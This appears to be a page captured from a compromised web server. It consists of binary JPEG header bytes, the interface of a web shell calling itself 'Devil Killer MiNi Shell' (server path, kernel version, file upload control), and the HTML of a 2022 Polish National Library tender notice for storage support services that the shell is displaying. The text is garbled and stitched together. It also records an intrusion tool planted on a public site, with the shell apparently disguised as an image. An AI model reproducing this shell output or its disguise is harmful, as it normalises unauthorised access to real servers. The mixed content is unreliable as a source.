JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220622/0021979001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa wsparcia serwisowego oraz asysty technicznej dla platformy pamięci masowych Repozytorium Cyfrowego Biblioteki Narodowej w Warszawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">BIBLIOTEKA NARODOWA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000275955</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 213</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-086</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48226082272</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@bn.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bn.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa wsparcia serwisowego oraz asysty technicznej dla platformy pamięci masowych Repozytorium Cyfrowego Biblioteki Narodowej w Warszawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e2771484-f221-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00219790</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00012478/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Wsparcie serwisowe oraz asysta techniczna dla platformy pamięci masowych niezbędne są do zapewnienia niezawodności oraz dostępności Repozytorium Cyfrowego Biblioteki Narodowej w Warszawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl/Zamawiajacy/AktualneOgloszenia?zamawiajacyId=2e20f960-d926-4498-8417-cf74dc190586. Powyższy link prowadzi do wykazu ogłoszeń Zamawiającego, gdzie w dziale „USŁUGI” należy wybrać sygnaturę XIV.263.6.2022 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, z zastrzeżeniem wymogów określonych w Rozdziale VIII SWZ. Środkiem komunikacji elektronicznej w niniejszym postępowaniu jest platforma on-line działająca pod adresem https://e-ProPublico.pl/ (zwana także „Platformą”) oraz poczta elektroniczna (e-mail: przetargi@bn.org.pl).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">#1. Wykonawca zamierzający złożyć ofertę w niniejszym postępowaniu musi posiadać konto na Platformie. Zamawiający zaleca Wykonawcom założenie konta na Platformie z odpowiednim wyprzedzeniem, przed dniem upływu terminu składania ofert w niniejszym postępowaniu.<br/>#2. Wykonawca, przystępując do postępowania, akceptuje warunki korzystania z Platformy określone w Regulaminie<br/>zamieszczonym na stronie internetowej https://e-ProPublico.pl/ oraz uznaje go za wiążący. #3. Do złożenia oferty konieczne jest<br/>posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub podpisu osobistego. #4. Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy: 1) stały dostęp do sieci Internet, 2) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (email),<br/>3) komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux, 4) zainstalowana dowolna<br/>przeglądarka internetowa – Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera), 5) włączona obsługa JavaScript oraz Cookies. #5. Zamawiający dopuszcza następujący format danych przesyłanych przy użyciu Platformy: pliki o wielkości do 20 MB w formatach: .pdf, .doc, .docx., .xlsx, .xml. #6. Zamawiający określa wymagania techniczne dotyczące użycia wskazanej skrzynki poczty elektronicznej do komunikacji w postępowaniu przy użyciu poczty elektronicznej (e-mail: przetargi@bn.org.pl): 1) dopuszczalna wielkość załączników dla jednej wiadomości e-mail: 50MB, 2) niedopuszczalne rozszerzenia plików: .ace, .vbe, .app, .docm, .exe, .ani, .reg, .scr, .vbs, .js, .ps1, .ps1xml, .ps2, .ps2xml, .psc1, .psc2. #7. W postępowaniu wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są za pośrednictwem Platformy (odpowiednio na karcie „Zapytania/Wyjaśnienia” albo „Wiadomości”) lub poczty elektronicznej (e-mail: przetargi@bn.org.pl), z zastrzeżeniem, że ofertę wraz z załącznikami, w tym oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa się za pośrednictwem Platformy, podpisaną kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym. Nie jest dopuszczalne przekazywanie oferty wraz z załącznikami za pośrednictwem poczty elektronicznej. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji<br/>przekazanych za pośrednictwem Platformy przyjmuje się datę ich zamieszczenia na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">#1. Administratorem danych jest: Biblioteka Narodowa z siedzibą w Warszawie, al. Niepodległości 213, 02-086 Warszawa. #2. Inspektor Ochrony Danych: kontakt jest możliwy poprzez wysłanie wiadomości na adres e-mail: daneosobowe@bn.org.pl lub wysyłanie pisma na adres Biblioteki Narodowej, podany powyżej. #3. Cel i podstawa prawna przetwarzania danych osobowych: dane osobowe niezbędne do udziału w postępowaniu będą przetwarzane w celu przeprowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji na podstawie art. 6 ust. 1 lit. c RODO. #4. Więcej informacji na temat ochrony danych<br/>osobowych w Bibliotece Narodowej znajduje się w Polityce Prywatności na stronie administratora: www.bn.org.pl oraz w Rozdziale XIX SWZ. #5. Wykonawca, ubiegając się o udzielenie zamówienia publicznego, zobowiązany jest do wypełnienia obowiązku informacyjnego: przewidzianego w art. 13 RODO wobec osób fizycznych, których dane osobowe dotyczą, i od których dane te wykonawca pozyskał bezpośrednio; przewidzianego w art. 14 RODO wobec osób fizycznych, których dane osobowe przekazuje Zamawiającemu i Bibliotece Narodowej, i których dane pośrednio pozyskał, chyba że znajdzie zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Prawa osób, których dane dotyczą: prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych gdy przetwarzanie danych osobowych narusza przepisy RODO lub inne przepisy określające sposób przetwarzania i ochrony danych osobowych, prawo dostępu do treści swoich danych, ich sprostowania lub uzupełnienia, a także ograniczenia przetwarzania, z tym zastrzeżeniem, że:<br/>a) skorzystanie z prawa do sprostowania lub uzupełnienia danych nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego, ani zmianą treści umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może spowodować naruszenia integralności protokołu postępowania oraz jego załączników;<br/>b) skorzystanie z prawa do ograniczenia przetwarzania nie znajdzie zastosowania w odniesieniu do przechowywania danych w celu<br/>zapewnienia korzystania ze środków ochrony prawnej, lub w celu ochrony praw innej osoby fizycznej/prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>Osobie, której dane dotyczą, nie przysługuje prawo do usunięcia danych osobowych (tzw. prawo do bycia zapomnianym) z uwagi na<br/>wyłączenie art. 17 ust. 3 lit. b, d lub e RODO, prawo do przenoszenia danych na podstawie art. 20 ust. 1 RODO, prawo sprzeciwu na podstawie art. 21 RODO, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">XIV.263.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usługi Wsparcia serwisowego oraz Asysty technicznej dla platformy pamięci<br/>masowych Repozytorium Cyfrowego Biblioteki Narodowej w Warszawie, zgodnie z Opisem Przedmiotu Zamówienia dla<br/>Części 1 (stanowiącym Załącznik nr 1 do SWZ) wraz z Załącznikiem nr 1 do Opisu Przedmiotu Zamówienia dla Części 1 -<br/>„Zestawienie półek i dysków w macierzach HUS 150” (stanowiącym<br/>Załącznik nr 5 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72591000-4 - Rozszerzanie umów serwisowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72611000-6 - Usługi w zakresie wsparcia technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Na podstawie kryteriów oceny ofert określonych w Rozdziale XVI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarantowany czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarantowany czas naprawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Asysta techniczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usługi Wsparcia serwisowego oraz Asysty technicznej dla platformy pamięci<br/>masowych Repozytorium Cyfrowego Biblioteki Narodowej w Warszawie, zgodnie z Opisem Przedmiotu Zamówienia dla<br/>Części 2 (stanowiącym Załącznik nr 2 do SWZ) wraz z Załącznikiem nr 1 do Opisu Przedmiotu Zamówienia dla Części 2 –<br/>„Zestawienie dysków w macierzy G350” (stanowiącym Załącznik nr 6 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72591000-4 - Rozszerzanie umów serwisowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72611000-6 - Usługi w zakresie wsparcia technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Na podstawie kryteriów oceny ofert określonych w Rozdziale XVI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarantowany czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarantowany czas naprawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Asysta techniczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu określone przez<br/>Zamawiającego, zgodnie z art. 112 ust. 2 ustawy Pzp, dotyczące zdolności technicznej lub zawodowej – Zamawiający uzna<br/>warunek dotyczący zdolności technicznej lub zawodowej za spełniony, jeżeli Wykonawca wykaże, że:<br/>#a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie co najmniej dwie usługi, każdą przez co najmniej 12 miesięcy i każdą o<br/>wartości zrealizowanej usługi w wysokości co najmniej:<br/>- w przypadku złożenia oferty dla Części 1: 200 000 zł (dwieście tysięcy złotych) netto w skali 12 miesięcy,<br/>- w przypadku złożenia oferty dla Części 2: 20 000 zł (dwadzieścia tysięcy złotych) netto w skali 12 miesięcy,<br/>polegające na wsparciu serwisowym oraz asyście technicznej dla platformy pamięci masowych opartych co najmniej o<br/>urządzenia firmy Hitachi.<br/>W przypadku usługi w trakcie wykonywania usługa musi być świadczona przez co najmniej 12 miesięcy przed upływem<br/>terminu składania ofert, a ww. wymagana wartość zrealizowanej usługi netto w skali 12 miesięcy dotyczy części usługi<br/>zrealizowanej do upływu terminu składania ofert.<br/>Uwagi Zamawiającego:<br/>- Zamawiający informuje, że jeżeli w celu potwierdzenia spełnienia ww. warunku udziału Wykonawca powołuje się na<br/>doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami, to zgodnie z postanowieniem w<br/>Rozdziale VII część B ust. 3 SWZ, Wykaz usług, o którym mowa w Rozdziale VII część B ust. 2 pkt 1 SWZ, musi dotyczyć<br/>tych z ww. usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń<br/>powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>- W przypadku gdy na potwierdzenie wartości wykonanej usługi będzie podana wartość w walucie obcej, Zamawiający<br/>dokona przeliczenia tej wartości na wartość w złotych według średniego kursu NBP (tabela A) dla danej waluty z dnia<br/>zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu zamieszczenia ogłoszenia w<br/>Biuletynie Zamówień Publicznych nie było publikacji NBP średnich kursów walut (tabela A), to Zamawiający dokona<br/>przeliczenia tej wartości na wartość w złotych według średniego kursu NBP (tabela A) dla danej waluty z pierwszego dnia<br/>następującego po zamieszczeniu ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym opublikowane<br/>zostały przez NBP średnie kursy walut (tabela A).<br/>#b) dysponuje odpowiednią zdolnością techniczną pozwalającą na świadczenie usługi Wsparcia serwisowego i Asysty<br/>technicznej na odpowiednim poziomie jakości, wyrażającą się w tym, że Wykonawca jest autoryzowanym partnerem<br/>producenta co najmniej w zakresie urządzeń Hitachi wymienionych odpowiednio:<br/>- w przypadku złożenia oferty dla Części 1: w Tabeli nr 1 w Opisie Przedmiotu Zamówienia dla Części 1 (Załącznik nr 1 do<br/>SWZ),<br/>- w przypadku złożenia oferty dla Części 2: w Tabeli nr 1 w Opisie Przedmiotu Zamówienia dla Części 2 (Załącznik nr 2 do<br/>SWZ).<br/>Wykonawca musi znajdować się na liście partnerów Hitachi.<br/>#c) dysponuje co najmniej następującymi osobami, które zostaną skierowane przez Wykonawcę do realizacji zamówienia:<br/>- w przypadku złożenia oferty dla Części 1: dysponuje przynajmniej 2 osobami, które zostaną skierowane przez Wykonawcę<br/>do realizacji zamówienia, posiadającymi ważne certyfikaty producenta „Installing and Supporting Hitachi Virtual Storage<br/>Platform Midrange Family” lub równoważne temu certyfikatowi dokumenty producenta uprawniające do obsługi i<br/>serwisowania urządzeń Hitachi wymienionych w Tabeli nr 1 w Opisie Przedmiotu Zamówienia dla Części 1 (Załącznik nr 1<br/>do SWZ) oraz dysponuje co najmniej 2 osobami, które zostaną skierowane przez Wykonawcę do realizacji zamówienia,<br/>posiadającymi ważne certyfikaty producenta „Hitachi Virtual Storage Platform and Hitachi Universal Storage Platform® V or<br/>VM Differences” lub równoważne temu certyfikatowi dokumenty producenta uprawniające do obsługi i serwisowania<br/>urządzeń Hitachi wymienionych w Tabeli nr 1 